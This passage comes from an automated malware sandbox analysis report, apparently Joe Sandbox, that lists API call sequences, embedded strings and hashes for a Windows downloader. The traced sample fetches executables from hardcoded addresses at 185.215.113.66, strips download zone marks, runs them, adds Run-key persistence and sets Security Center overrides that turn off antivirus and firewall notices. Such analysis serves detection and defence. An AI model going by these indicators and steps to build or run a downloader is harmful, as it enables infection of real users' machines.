                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: AcquireContextCrypt
                                                                                • String ID:
                                                                                • API String ID: 3951991833-0
                                                                                • Opcode ID: 13b6d9095c7e39f6188444a19bf1c7e97284b846dffc34c4c743c3211461be8c
                                                                                • Instruction ID: b725af2ef275d96960ec775c50a2340f06929c739b5a4a2b4082053813d63471
                                                                                • Opcode Fuzzy Hash: 13b6d9095c7e39f6188444a19bf1c7e97284b846dffc34c4c743c3211461be8c
                                                                                • Instruction Fuzzy Hash: 04B092302C8708F6E9602695AC07F8076088B48F22F204010B309681CA49E1B20822FE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00DB1329
                                                                                • srand.MSVCR90 ref: 00DB1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00DB1350
                                                                                • strlen.MSVCR90 ref: 00DB135A
                                                                                • mbstowcs.MSVCR90 ref: 00DB1371
                                                                                • rand.MSVCR90 ref: 00DB1379
                                                                                • rand.MSVCR90 ref: 00DB138D
                                                                                • wsprintfW.USER32 ref: 00DB13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00DB13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DB13F9
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB1428
                                                                                • memset.MSVCR90 ref: 00DB144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 00DB1471
                                                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00DB14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00DB14B1
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB14BC
                                                                                • wsprintfW.USER32 ref: 00DB14D5
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00DB14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB14F0
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB153E
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00DB154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1570
                                                                                • rand.MSVCR90 ref: 00DB1585
                                                                                • Sleep.KERNEL32 ref: 00DB159C
                                                                                • rand.MSVCR90 ref: 00DB15A2
                                                                                • rand.MSVCR90 ref: 00DB15B6
                                                                                • wsprintfW.USER32 ref: 00DB15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 00DB15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00DB1601
                                                                                • wsprintfW.USER32 ref: 00DB161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB1677
                                                                                Strings
                                                                                • %ls:Zone.Identifier, xrefs: 00DB14C9
                                                                                • %temp%, xrefs: 00DB134B
                                                                                • %s\%d%d.exe, xrefs: 00DB13A8
                                                                                • %ls:Zone.Identifier, xrefs: 00DB1611
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 00DB13C5
                                                                                • %s\%d%d.exe, xrefs: 00DB15CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$Closewsprintf$Handle$Open$CacheChangeCountCreateDownloadEntryEnvironmentExpandFindNotificationReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 101429522-1471993759
                                                                                • Opcode ID: 5a1cdec339022d55f25b1a36af9e658e12d53b014332466433d3d8ee2c5f9887
                                                                                • Instruction ID: ecdcfdc283ded5e2a40b7bc776c554af787e21e01fc3d100d4b47b4e946b9e34
                                                                                • Opcode Fuzzy Hash: 5a1cdec339022d55f25b1a36af9e658e12d53b014332466433d3d8ee2c5f9887
                                                                                • Instruction Fuzzy Hash: 6281C3B5900314EBD720EB64DC5AFEA7379AF88700F444698F60AD2281DA75EB94CF71

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 86 db1690-db16f0 memset * 2 CreateProcessW 87 db16f2-db16ff Sleep 86->87 88 db1701-db1725 ShellExecuteW 86->88 89 db1738-db173b 87->89 90 db1727-db1734 Sleep 88->90 91 db1736 88->91 90->89 91->89
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00DB169E
                                                                                • memset.MSVCR90 ref: 00DB16AE
                                                                                • CreateProcessW.KERNELBASE(00000000,00DB166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00DB16E7
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,00DB166B,00000000,00000000,00000000), ref: 00DB1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB172C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 9f8903f60554e59037c298084ce10d6c588f649ce6426cc02248302180e9ced4
                                                                                • Instruction ID: e45fc493c21031ba342910cac64357019ee2966a1d6d3246bb0c18a89524e15e
                                                                                • Opcode Fuzzy Hash: 9f8903f60554e59037c298084ce10d6c588f649ce6426cc02248302180e9ced4
                                                                                • Instruction Fuzzy Hash: 18111F75A90308FBEB10DF90DC56FDD7778AB14B01F600115FA09AF2C0DAB1AA049775

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00DB17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DB17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00DB17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1822
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 00DB17A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: f31d3675f910630ce9d87874e19aa10427e22dd1e856fd3a9396b9890415faa1
                                                                                • Instruction ID: 9a1a62aff80fe434aed324d50b7c2c33519d8d44463de381cf86301bc6d19ace
                                                                                • Opcode Fuzzy Hash: f31d3675f910630ce9d87874e19aa10427e22dd1e856fd3a9396b9890415faa1
                                                                                • Instruction Fuzzy Hash: AD21FC79A40308FBDB10DF94CC49FDEB7B9AB08705F148558EA15AB2C0C7B56A00DB61

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 b510a0-b510b8 Sleep call b51000 3 b5111d-b51120 0->3 4 b510ba-b51117 DeleteUrlCacheEntry * 9 0->4 4->3
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00B510A8
                                                                                  • Part of subcall function 00B51000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00B5101A
                                                                                  • Part of subcall function 00B51000: wsprintfW.USER32 ref: 00B51033
                                                                                  • Part of subcall function 00B51000: PathFileExistsW.KERNELBASE(?), ref: 00B51043
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00B510BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 00B510CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 00B510D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 00B510E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 00B510EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 00B510F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00B51101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 00B5110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00B51117
                                                                                Strings
                                                                                • http://185.215.113.66/6, xrefs: 00B510F1
                                                                                • http://185.215.113.66/_3, xrefs: 00B51112
                                                                                • http://185.215.113.66/1, xrefs: 00B510BA
                                                                                • http://185.215.113.66/2, xrefs: 00B510C5
                                                                                • http://185.215.113.66/4, xrefs: 00B510DB
                                                                                • http://185.215.113.66/_2, xrefs: 00B51107
                                                                                • http://185.215.113.66/_1, xrefs: 00B510FC
                                                                                • http://185.215.113.66/3, xrefs: 00B510D0
                                                                                • http://185.215.113.66/5, xrefs: 00B510E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1835628262.0000000000B51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B50000, based on PE: true
                                                                                • Associated: 00000008.00000002.1835614748.0000000000B50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1835663055.0000000000B54000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_b50000_2303012543.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: b26271f0645c514db0bae58711f30a7976a377d147c4b996099ee5c1eafbdad8
                                                                                • Instruction ID: 37d188f7c09cc6828c5a6e84a4435a0274b077dc4f518cfa90589a3da9ee7326
                                                                                • Opcode Fuzzy Hash: b26271f0645c514db0bae58711f30a7976a377d147c4b996099ee5c1eafbdad8
                                                                                • Instruction Fuzzy Hash: 7EF09B71243300EF830227E46C0EB4576949A47B5374800C2FA06A71F1CD94404CDB3E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 b51000-b5104b ExpandEnvironmentStringsW wsprintfW 7 b51053-b5107c 5->7 8 b5104d-b5104f 5->8 11 b5107e-b51084 7->11 12 b5108b 7->12 9 b5108d-b51090 8->9 11->12 12->9
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00B5101A
                                                                                • wsprintfW.USER32 ref: 00B51033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00B51043
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00B51069
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00B51085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1835628262.0000000000B51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B50000, based on PE: true
                                                                                • Associated: 00000008.00000002.1835614748.0000000000B50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1835663055.0000000000B54000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_b50000_2303012543.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 2220190937-433313667
                                                                                • Opcode ID: 4b0b788e90ea8ced34f496507453fef4badbdc923284df91f689f97dbfa522d2
                                                                                • Instruction ID: 76e5aeae0703dca043c74648b5a1314f25e14704f7d80edbbc2b2cb62440a1df
                                                                                • Opcode Fuzzy Hash: 4b0b788e90ea8ced34f496507453fef4badbdc923284df91f689f97dbfa522d2
                                                                                • Instruction Fuzzy Hash: 2401D4B454130C6BDB309B209C4AFE67378EB41702F0846D4AB18A20D1DAB05AC9DFA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 002A1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 002A18E8
                                                                                • GetLastError.KERNEL32 ref: 002A18F4
                                                                                • ExitProcess.KERNEL32 ref: 002A1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002A196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 002A197A
                                                                                • wsprintfW.USER32 ref: 002A1999
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A19A9
                                                                                • wcscmp.MSVCR90 ref: 002A19C2
                                                                                • ExitProcess.KERNEL32 ref: 002A19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$46*$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$L6*$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$d6*h6*l6*$http://185.215.113.66/$l6*$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-2999526188
                                                                                • Opcode ID: 74fbb35c8f1cc88c9f7f4b064881e86fd3c70140029f4a5b378742664518f5f7
                                                                                • Instruction ID: 296e946222104e9600998789959d8293a108c6490cddd3c316e42e7cfd631e8f
                                                                                • Opcode Fuzzy Hash: 74fbb35c8f1cc88c9f7f4b064881e86fd3c70140029f4a5b378742664518f5f7
                                                                                • Instruction Fuzzy Hash: D6F132F1A50314ABEB24DB60DC4AFEAB779AB4A714F0045C8B309A6190DFB15B98CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 112 2a1100-2a1132 CryptImportKey 113 2a1138-2a1158 CreateFileW 112->113 114 2a1316-2a131c 112->114 115 2a115e-2a1171 GetFileSize 113->115 116 2a130c-2a1310 CryptDestroyKey 113->116 117 2a1302-2a1306 CloseHandle 115->117 118 2a1177-2a1192 CreateFileMappingA 115->118 116->114 117->116 119 2a1198-2a11b1 MapViewOfFile 118->119 120 2a12de-2a12e4 118->120 122 2a11b7-2a11c0 119->122 123 2a12d4-2a12d8 CloseHandle 119->123 120->117 121 2a12e6-2a12fc SetFilePointer SetEndOfFile 120->121 121->117 124 2a12ca-2a12ce UnmapViewOfFile 122->124 125 2a11c6-2a11cd 122->125 123->120 124->123 125->124 126 2a11d3-2a11dc 125->126 126->124 127 2a11e2-2a11fe CryptCreateHash 126->127 127->124 128 2a1204-2a1241 GetProcessHeap HeapAlloc 127->128 128->124 129 2a1247-2a127c call 2a1020 CryptHashData 128->129 132 2a127e-2a129d CryptVerifySignatureA 129->132 133 2a12b7-2a12c4 GetProcessHeap HeapFree 129->133 132->133 134 2a129f-2a12b4 memcpy 132->134 133->124 134->133
                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,002A31C8,00000214,00000000,00000000,00000000), ref: 002A112A
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 002A114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 002A1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 002A1185
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 002A11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 002A11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A122D
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 002A1234
                                                                                  • Part of subcall function 002A1020: memcpy.MSVCR90 ref: 002A107F
                                                                                  • Part of subcall function 002A1020: memcpy.MSVCR90 ref: 002A1093
                                                                                  • Part of subcall function 002A1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 002A10B7
                                                                                  • Part of subcall function 002A1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 002A10DD
                                                                                  • Part of subcall function 002A1020: CryptDestroyKey.ADVAPI32(00000000), ref: 002A10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 002A1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 002A1295
                                                                                • memcpy.MSVCR90 ref: 002A12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 002A12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 002A12CE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 002A12D8
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 002A12F2
                                                                                • SetEndOfFile.KERNEL32(000000FF), ref: 002A12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 002A1310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 1316431928-4070929822
                                                                                • Opcode ID: 026e9932148ead48c09488f74b5cadaf59d98c890036152493b991f45781375c
                                                                                • Instruction ID: f66fa7e3dfa219befde8f840079eb442cf091ae15178157b326f5b9fea254e04
                                                                                • Opcode Fuzzy Hash: 026e9932148ead48c09488f74b5cadaf59d98c890036152493b991f45781375c
                                                                                • Instruction Fuzzy Hash: 62613B75A00219EFDB14CFE4DC4AFAEBBB9BB49700F148548F605B7280DB75AA51CB60

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 149 2a1020-2a105c 150 2a105e-2a1064 149->150 151 2a1066 149->151 152 2a106d-2a10bf memcpy * 2 CryptImportKey 150->152 151->152 153 2a10c1-2a10f0 CryptEncrypt CryptDestroyKey 152->153 154 2a10f6-2a10fc 152->154 153->154
                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 002A107F
                                                                                • memcpy.MSVCR90 ref: 002A1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 002A10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 002A10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 002A10F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: 1ef24f869eef4b7dfb0a0d3a08e633a19e5fd87963f76f2aa961d6dd3984ee98
                                                                                • Instruction ID: 22cede6cbe7557abd33e419a427013106f543898051fa9f35dc9221fa4aa558b
                                                                                • Opcode Fuzzy Hash: 1ef24f869eef4b7dfb0a0d3a08e633a19e5fd87963f76f2aa961d6dd3984ee98
                                                                                • Instruction Fuzzy Hash: 543138B1D10249EFDB00CFE8C845BEEBBB4AF4D310F008159EA05B7280DB759A54CBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 155 2a1740-2a177c memset GetLocaleInfoA strcmp 156 2a177e-2a1780 155->156 157 2a1782 155->157 158 2a1784-2a1787 156->158 157->158
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 002A174E
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A), ref: 002A1763
                                                                                • strcmp.MSVCR90 ref: 002A1772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 353606852dfe747a7c70056c88ef22ad2b0ea14e60d4f55027bb1e61c9fde1b1
                                                                                • Instruction ID: a308b455ed623421198001be98923305b233d328156d793f07b621c1a021e613
                                                                                • Opcode Fuzzy Hash: 353606852dfe747a7c70056c88ef22ad2b0ea14e60d4f55027bb1e61c9fde1b1
                                                                                • Instruction Fuzzy Hash: 53E09276E6430877DA00A6A09C07FAA73285713B11F000150BA04560C1FEA1673886D2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 002A1329
                                                                                • srand.MSVCR90 ref: 002A1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 002A1350
                                                                                • strlen.MSVCR90 ref: 002A135A
                                                                                • mbstowcs.MSVCR90 ref: 002A1371
                                                                                • rand.MSVCR90 ref: 002A1379
                                                                                • rand.MSVCR90 ref: 002A138D
                                                                                • wsprintfW.USER32 ref: 002A13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 002A13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002A13F9
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 002A1428
                                                                                • memset.MSVCR90 ref: 002A144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 002A1471
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 002A14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A14B1
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A14BC
                                                                                • wsprintfW.USER32 ref: 002A14D5
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A14F0
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A153E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1570
                                                                                • rand.MSVCR90 ref: 002A1585
                                                                                • Sleep.KERNEL32 ref: 002A159C
                                                                                • rand.MSVCR90 ref: 002A15A2
                                                                                • rand.MSVCR90 ref: 002A15B6
                                                                                • wsprintfW.USER32 ref: 002A15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 002A15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 002A1601
                                                                                • wsprintfW.USER32 ref: 002A161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A1677
